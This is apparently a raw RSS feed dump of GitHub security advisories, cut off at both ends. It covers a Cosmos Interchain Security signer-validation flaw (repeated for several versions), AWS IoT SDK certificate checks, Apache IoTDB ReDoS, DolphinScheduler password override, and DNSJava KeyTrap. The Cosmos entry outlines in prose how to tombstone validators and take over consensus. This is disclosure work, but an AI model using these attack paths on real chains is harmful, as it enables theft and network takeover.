<li>By changing consumer keys on a consumer node, double signing, and submitting evidence back to the provider, any user could tombstone any provider validator. This would cause the provider's active set to change. At scale, this exploit could be applied to all active provider validators and a well-funded attacker could then run their own nodes and take over consensus on the provider and on consumer chains.</li>
</ul>
<p><strong>Likelihood:</strong> Rare</p>
<ul>
<li>The bug was discovered internally. There is no evidence that any external party has identified this vulnerability. </li>
<li>The bug has been live for two weeks with no issues. </li>
<li>All four message types are ones that only validators use, and rarely use in daily operations.</li>
<li>In the Cosmos Hub’s recent history (May - Aug), there has been only one instance of any of these message types, which was performed in accordance with chain rules.</li>
<li>The catastrophic exploits (such as tombstoning the entire validator set of the provider) are also extremely complex. They involve several operations that are not well-understood by many people, and the entire exploit must occur quickly and at-scale to avoid other node operators responding defensively.</li>
</ul>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/cosmos/interchain-security/security/advisories/GHSA-7q74-g774-7x3g">https://github.com/cosmos/interchain-security/security/advisories/GHSA-7q74-g774-7x3g</a></li>
<li><a href="https://github.com/advisories/GHSA-7q74-g774-7x3g">https://github.com/advisories/GHSA-7q74-g774-7x3g</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-7q74-g774-7x3g</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-7q74-g774-7x3g</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/cosmos/interchain-security/v3] Interchain Security: The signers of ICS messages do not need to match the provider address</title>
<description><h3 id="context">Context</h3>
<p>ICS has the following four messages that enable validators on the provider chain to perform different actions:</p>
<ul>
<li><code>MsgOptIn</code> -- adds a validator to the consumer chain’s active set</li>
<li><code>MsgOptOut</code> -- removes a validator from the consumer chain’s active set </li>
<li><code>MsgAssignConsumerKey</code> -- changes the consensus key used for a validator’s operations on a consumer chain</li>
<li><code>MsgSetConsumerCommissionRate</code> -- sets a validator’s consumer-specific commission rate</li>
</ul>
<p>Normally, only the respective validators are allowed to perform these actions. </p>
<h3 id="issue">Issue</h3>
<p>The upgrade to SDK 0.50 introduced a <a href="https://docs.cosmos.network/v0.50/build/building-modules/protobuf-annotations#signer">signer</a> field to these messages. This field is used to authenticate the user sending the message to the system. However, there was no validation on the ICS side to check if the signer matches the provider address. </p>
<p>As a result, any user could opt-in, opt-out, change the commission rate, or change what public key a validator uses on a consumer chain. </p>
<p>For more context, check out the code:</p>
<ul>
<li>proto files <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52</a></li>
<li>message validation <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106</a></li>
<li>message handling <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52</a></li>
</ul>
<h3 id="severity-assessment">Severity assessment</h3>
<p>The severity assessment is based on <a href="https://github.com/interchainio/security/blob/main/resources/CLASSIFICATION_MATRIX.md">this framework</a>. </p>
<p><strong>Potential impact:</strong> Catastrophic </p>
<ul>
<li>By changing consumer keys for 1/3+ of a consumer chain's validator set, any user could cause a consumer chain to halt. Given that the consumer is down, the provider will jail provider validators for consumer downtime, so this exploit would not have impacted the provider directly. Consumer chain halts would need to be addressed by a provider-side patch.</li>
<li>By changing consumer keys on a consumer node, double signing, and submitting evidence back to the provider, any user could tombstone any provider validator. This would cause the provider's active set to change. At scale, this exploit could be applied to all active provider validators and a well-funded attacker could then run their own nodes and take over consensus on the provider and on consumer chains.</li>
</ul>
<p><strong>Likelihood:</strong> Rare</p>
<ul>
<li>The bug was discovered internally. There is no evidence that any external party has identified this vulnerability. </li>
<li>The bug has been live for two weeks with no issues. </li>
<li>All four message types are ones that only validators use, and rarely use in daily operations.</li>
<li>In the Cosmos Hub’s recent history (May - Aug), there has been only one instance of any of these message types, which was performed in accordance with chain rules.</li>
<li>The catastrophic exploits (such as tombstoning the entire validator set of the provider) are also extremely complex. They involve several operations that are not well-understood by many people, and the entire exploit must occur quickly and at-scale to avoid other node operators responding defensively.</li>
</ul>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/cosmos/interchain-security/security/advisories/GHSA-7q74-g774-7x3g">https://github.com/cosmos/interchain-security/security/advisories/GHSA-7q74-g774-7x3g</a></li>
<li><a href="https://github.com/advisories/GHSA-7q74-g774-7x3g">https://github.com/advisories/GHSA-7q74-g774-7x3g</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-7q74-g774-7x3g</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-7q74-g774-7x3g</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/cosmos/interchain-security/v2] Interchain Security: The signers of ICS messages do not need to match the provider address</title>
<description><h3 id="context">Context</h3>
<p>ICS has the following four messages that enable validators on the provider chain to perform different actions:</p>
<ul>
<li><code>MsgOptIn</code> -- adds a validator to the consumer chain’s active set</li>
<li><code>MsgOptOut</code> -- removes a validator from the consumer chain’s active set </li>
<li><code>MsgAssignConsumerKey</code> -- changes the consensus key used for a validator’s operations on a consumer chain</li>
<li><code>MsgSetConsumerCommissionRate</code> -- sets a validator’s consumer-specific commission rate</li>
</ul>
<p>Normally, only the respective validators are allowed to perform these actions. </p>
<h3 id="issue">Issue</h3>
<p>The upgrade to SDK 0.50, introduced a <a href="https://docs.cosmos.network/v0.50/build/building-modules/protobuf-annotations#signer">signer</a> field to these messages. This field is used to authenticate the user sending the message to the system. However, there was no validation on the ICS side to check if the signer matches the provider address. </p>
<p>As a result, any user could opt-in, opt-out, change the commission rate, or change what public key a validator uses on a consumer chain. </p>
<p>For more context, check out the code:</p>
<ul>
<li>proto files <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52</a></li>
<li>message validation <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106</a></li>
<li>message handling <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52</a></li>
</ul>
<h3 id="severity-assessment">Severity assessment</h3>
<p>The severity assessment is based on <a href="https://github.com/interchainio/security/blob/main/resources/CLASSIFICATION_MATRIX.md">this framework</a>. </p>
<p><strong>Potential impact:</strong> Catastrophic </p>
<ul>
<li>By changing consumer keys for 1/3+ of a consumer chain's validator set, any user could cause a consumer chain to halt. Given that the consumer is down, the provider will jail provider validators for consumer downtime, so this exploit would not have impacted the provider directly. Consumer chain halts would need to be addressed by a provider-side patch.</li>
<li>By changing consumer keys on a consumer node, double signing, and submitting evidence back to the provider, any user could tombstone any provider validator. This would cause the provider's active set to change. At scale, this exploit could be applied to all active provider validators and a well-funded attacker could then run their own nodes and take over consensus on the provider and on consumer chains.</li>
</ul>
<p><strong>Likelihood:</strong> Rare</p>
<ul>
<li>The bug was discovered internally. There is no evidence that any external party has identified this vulnerability. </li>
<li>The bug has been live for two weeks with no issues. </li>
<li>All four message types are ones that only validators use, and rarely use in daily operations.</li>
<li>In the Cosmos Hub’s recent history (May - Aug), there has been only one instance of any of these message types, which was performed in accordance with chain rules.</li>
<li>The catastrophic exploits (such as tombstoning the entire validator set of the provider) are also extremely complex. They involve several operations that are not well-understood by many people, and the entire exploit must occur quickly and at-scale to avoid other node operators responding defensively.</li>
</ul>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/cosmos/interchain-security/security/advisories/GHSA-7q74-g774-7x3g">https://github.com/cosmos/interchain-security/security/advisories/GHSA-7q74-g774-7x3g</a></li>
<li><a href="https://github.com/advisories/GHSA-7q74-g774-7x3g">https://github.com/advisories/GHSA-7q74-g774-7x3g</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-7q74-g774-7x3g</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-7q74-g774-7x3g</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/cosmos/interchain-security] Interchain Security: The signers of ICS messages do not need to match the provider address</title>
<description><h3 id="context">Context</h3>
<p>ICS has the following four messages that enable validators on the provider chain to perform different actions:</p>
<ul>
<li><code>MsgOptIn</code> -- adds a validator to the consumer chain’s active set</li>
<li><code>MsgOptOut</code> -- removes a validator from the consumer chain’s active set </li>
<li><code>MsgAssignConsumerKey</code> -- changes the consensus key used for a validator’s operations on a consumer chain</li>
<li><code>MsgSetConsumerCommissionRate</code> -- sets a validator’s consumer-specific commission rate</li>
</ul>
<p>Normally, only the respective validators are allowed to perform these actions. </p>
<h3 id="issue">Issue</h3>
<p>The upgrade to SDK 0.50, introduced a <a href="https://docs.cosmos.network/v0.50/build/building-modules/protobuf-annotations#signer">signer</a> field to these messages. This field is used to authenticate the user sending the message to the system. However, there was no validation on the ICS side to check if the signer matches the provider address. </p>
<p>As a result, any user could opt-in, opt-out, change the commission rate, or change what public key a validator uses on a consumer chain. </p>
<p>For more context, check out the code:</p>
<ul>
<li>proto files <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52</a></li>
<li>message validation <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106</a></li>
<li>message handling <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52</a></li>
</ul>
<h3 id="severity-assessment">Severity assessment</h3>
<p>The severity assessment is based on <a href="https://github.com/interchainio/security/blob/main/resources/CLASSIFICATION_MATRIX.md">this framework</a>. </p>
<p><strong>Potential impact:</strong> Catastrophic </p>
<ul>
... |
http://localhost:1200/github-advisor/data/maven - Success ✔️<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - maven</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github-advisor/data/maven" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - maven - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Fri, 13 Sep 2024 16:19:17 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>[software.amazon.awssdk.iotdevicesdk:aws-iot-device-sdk] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>Connections initialized by the AWS IoT Device SDK v2 for Java (versions prior to 1.3.3), Python (versions prior to 1.5.18), C++ (versions prior to 1.12.7) and Node.js (versions prior to 1.5.1) did not verify server certificate hostname during TLS handshake when overriding Certificate Authorities (CA) in their trust stores on Windows. This issue has been addressed in aws-c-io submodule versions 0.9.13 onward. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.3.3 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.5.18 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on Microsoft Windows.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40828">https://nvd.nist.gov/vuln/detail/CVE-2021-40828</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2">https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2/commit/4be41394f1aee979e6f4b012fcb01eecabd0c08d">https://github.com/aws/aws-iot-device-sdk-js-v2/commit/4be41394f1aee979e6f4b012fcb01eecabd0c08d</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2/commit/fd4c0ba04b35eab9e20c635af5548fcc5a92d8be">https://github.com/aws/aws-iot-device-sdk-python-v2/commit/fd4c0ba04b35eab9e20c635af5548fcc5a92d8be</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-94jq-q5v2-76wj">https://github.com/advisories/GHSA-94jq-q5v2-76wj</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-861.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-861.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-94jq-q5v2-76wj</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-94jq-q5v2-76wj</guid>
<author>GitHub</author>
</item>
<item>
<title>[software.amazon.awssdk.iotdevicesdk:aws-iot-device-sdk] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>The AWS IoT Device SDK v2 for Java, Python, C++ and Node.js appends a user supplied Certificate Authority (CA) to the root CAs instead of overriding it on Unix systems. TLS handshakes will thus succeed if the peer can be verified either from the user-supplied CA or the system’s default trust-store. Attackers with access to a host’s trust stores or are able to compromise a certificate authority already in the host's trust store (note: the attacker must also be able to spoof DNS in this case) may be able to use this issue to bypass CA pinning. An attacker could then spoof the MQTT broker, and either drop traffic and/or respond with the attacker's data, but they would not be able to forward this data on to the MQTT broker because the attacker would still need the user's private keys to authenticate against the MQTT broker. The 'aws_tls_ctx_options_override_default_trust_store_*' function within the aws-c-io submodule has been updated to override the default trust store. This corrects this issue. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.5.0 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.6.1 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on Linux/Unix. Amazon Web Services AWS-C-IO 0.10.4 on Linux/Unix.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40830">https://nvd.nist.gov/vuln/detail/CVE-2021-40830</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2">https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2/commit/53a36e3ac203291494120604d416b6de59177cac">https://github.com/aws/aws-iot-device-sdk-js-v2/commit/53a36e3ac203291494120604d416b6de59177cac</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2/commit/0450ce68add7e3d05c6d781ecdac953c299c053a">https://github.com/aws/aws-iot-device-sdk-python-v2/commit/0450ce68add7e3d05c6d781ecdac953c299c053a</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-c4rh-4376-gff4">https://github.com/advisories/GHSA-c4rh-4376-gff4</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-863.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-863.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-c4rh-4376-gff4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-c4rh-4376-gff4</guid>
<author>GitHub</author>
</item>
<item>
<title>[software.amazon.awssdk.iotdevicesdk:aws-iot-device-sdk] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>The AWS IoT Device SDK v2 for Java, Python, C++ and Node.js appends a user supplied Certificate Authority (CA) to the root CAs instead of overriding it on macOS systems. Additionally, SNI validation is also not enabled when the CA has been "overridden". TLS handshakes will thus succeed if the peer can be verified either from the user-supplied CA or the system’s default trust-store. Attackers with access to a host’s trust stores or are able to compromise a certificate authority already in the host's trust store (note: the attacker must also be able to spoof DNS in this case) may be able to use this issue to bypass CA pinning. An attacker could then spoof the MQTT broker, and either drop traffic and/or respond with the attacker's data, but they would not be able to forward this data on to the MQTT broker because the attacker would still need the user's private keys to authenticate against the MQTT broker. The <code>aws_tls_ctx_options_override_default_trust_store_*</code> function within the aws-c-io submodule has been updated to address this behavior. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.5.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.7.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.14.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.6.0 on macOS. Amazon Web Services AWS-C-IO 0.10.7 on macOS.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40831">https://nvd.nist.gov/vuln/detail/CVE-2021-40831</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commit/46375e9b1bfb34109b9ff3b1eff9c770f9daa186">https://github.com/aws/aws-iot-device-sdk-java-v2/commit/46375e9b1bfb34109b9ff3b1eff9c770f9daa186</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2/commit/22f1989f5bdb0bdd9c912a5a2d255ee6c0854f68">https://github.com/aws/aws-iot-device-sdk-js-v2/commit/22f1989f5bdb0bdd9c912a5a2d255ee6c0854f68</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2/commit/5aef82573202309063eb540b72cee0e565f85a2d">https://github.com/aws/aws-iot-device-sdk-python-v2/commit/5aef82573202309063eb540b72cee0e565f85a2d</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-j3f7-7rmc-6wqj">https://github.com/advisories/GHSA-j3f7-7rmc-6wqj</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-864.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-864.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-j3f7-7rmc-6wqj</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-j3f7-7rmc-6wqj</guid>
<author>GitHub</author>
</item>
<item>
<title>[software.amazon.awssdk.iotdevicesdk:aws-iot-device-sdk] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>Connections initialized by the AWS IoT Device SDK v2 for Java (versions prior to 1.4.2), Python (versions prior to 1.6.1), C++ (versions prior to 1.12.7) and Node.js (versions prior to 1.5.3) did not verify server certificate hostname during TLS handshake when overriding Certificate Authorities (CA) in their trust stores on MacOS. This issue has been addressed in aws-c-io submodule versions 0.10.5 onward. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.4.2 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.6.1 on macOS. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on macOS. Amazon Web Services AWS-C-IO 0.10.4 on macOS.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40829">https://nvd.nist.gov/vuln/detail/CVE-2021-40829</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commits/v1.4.2">https://github.com/aws/aws-iot-device-sdk-java-v2/commits/v1.4.2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-743r-5g92-5vgf">https://github.com/advisories/GHSA-743r-5g92-5vgf</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-862.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-862.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-743r-5g92-5vgf</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-743r-5g92-5vgf</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.apache.iotdb:tsfile] Apache IoTDB subject to ReDOS with Java 8</title>
<description><p>Apache IoTDB versions 0.12.2 through 0.12.6, and 0.13.0 through 0.13.2 are vulnerable to a Denial of Service attack when accepting untrusted patterns for REGEXP queries with Java 8. This issue is patched in 0.13.3. Users should upgrade or use a later version of Java to avoid it.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2022-43766">https://nvd.nist.gov/vuln/detail/CVE-2022-43766</a></li>
<li><a href="https://lists.apache.org/thread/9pgpb82p5brooy41n8l5q0y9h33db2zn">https://lists.apache.org/thread/9pgpb82p5brooy41n8l5q0y9h33db2zn</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2022-42972.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2022-42972.yaml</a></li>
<li><a href="https://github.com/advisories/GHSA-g6hg-4v3c-6jq7">https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.apache.iotdb:iotdb-server] Apache IoTDB subject to ReDOS with Java 8</title>
<description><p>Apache IoTDB versions 0.12.2 through 0.12.6, and 0.13.0 through 0.13.2 are vulnerable to a Denial of Service attack when accepting untrusted patterns for REGEXP queries with Java 8. This issue is patched in 0.13.3. Users should upgrade or use a later version of Java to avoid it.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2022-43766">https://nvd.nist.gov/vuln/detail/CVE-2022-43766</a></li>
<li><a href="https://lists.apache.org/thread/9pgpb82p5brooy41n8l5q0y9h33db2zn">https://lists.apache.org/thread/9pgpb82p5brooy41n8l5q0y9h33db2zn</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2022-42972.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2022-42972.yaml</a></li>
<li><a href="https://github.com/advisories/GHSA-g6hg-4v3c-6jq7">https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.apache.iotdb:flink-tsfile-connector] Apache IoTDB subject to ReDOS with Java 8</title>
<description><p>Apache IoTDB versions 0.12.2 through 0.12.6, and 0.13.0 through 0.13.2 are vulnerable to a Denial of Service attack when accepting untrusted patterns for REGEXP queries with Java 8. This issue is patched in 0.13.3. Users should upgrade or use a later version of Java to avoid it.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2022-43766">https://nvd.nist.gov/vuln/detail/CVE-2022-43766</a></li>
<li><a href="https://lists.apache.org/thread/9pgpb82p5brooy41n8l5q0y9h33db2zn">https://lists.apache.org/thread/9pgpb82p5brooy41n8l5q0y9h33db2zn</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2022-42972.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2022-42972.yaml</a></li>
<li><a href="https://github.com/advisories/GHSA-g6hg-4v3c-6jq7">https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.apache.dolphinscheduler:dolphinscheduler-api] Incorrect Default Permissions in Apache DolphinScheduler</title>
<description><p>Versions of Apache DolphinScheduler prior to 1.3.2 allowed an ordinary user under any tenant to override another users password through the API interface.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-13922">https://nvd.nist.gov/vuln/detail/CVE-2020-13922</a></li>
<li><a href="https://github.com/apache/incubator-dolphinscheduler/commit/b8a9e2e00f2f207ae60c913a7173b59405ff95f1">https://github.com/apache/incubator-dolphinscheduler/commit/b8a9e2e00f2f207ae60c913a7173b59405ff95f1</a></li>
<li><a href="https://www.mail-archive.com/announce@apache.org/msg06076.html">https://www.mail-archive.com/announce@apache.org/msg06076.html</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/apache-dolphinscheduler/PYSEC-2021-876.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/apache-dolphinscheduler/PYSEC-2021-876.yaml</a></li>
<li><a href="https://www.mail-archive.com/announce%40apache.org/msg06076.html">https://www.mail-archive.com/announce%40apache.org/msg06076.html</a></li>
<li><a href="https://github.com/advisories/GHSA-qhh5-9738-g9mx">https://github.com/advisories/GHSA-qhh5-9738-g9mx</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-qhh5-9738-g9mx</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-qhh5-9738-g9mx</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.apache.iotdb:iotdb-grafana-connector] Apache IoTDB Grafana Connector vulnerable to Improper Authentication</title>
<description><p>Improper Authentication vulnerability in Apache Software Foundation Apache IoTDB. This issue affects Apache IoTDB Grafana Connector from 0.13.0 through 0.13.3.</p>
<p>Attackers could log in without authorization. This is fixed in 0.13.4.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-24831">https://nvd.nist.gov/vuln/detail/CVE-2023-24831</a></li>
<li><a href="https://lists.apache.org/thread/3dgvzgstycf8b5hyf4z3n7cqdhcyln3l">https://lists.apache.org/thread/3dgvzgstycf8b5hyf4z3n7cqdhcyln3l</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2023-7.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2023-7.yaml</a></li>
<li><a href="https://github.com/advisories/GHSA-pvjv-386f-c8wh">https://github.com/advisories/GHSA-pvjv-386f-c8wh</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-pvjv-386f-c8wh</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-pvjv-386f-c8wh</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.jitsi:dnssecjava] DNSJava affected by KeyTrap - NSEC3 closest encloser proof can exhaust CPU resources</title>
<description><h3 id="impact">Impact</h3>
<p>Users using the <code>ValidatingResolver</code> for DNSSEC validation can run into CPU exhaustion with specially crafted DNSSEC-signed zones.</p>
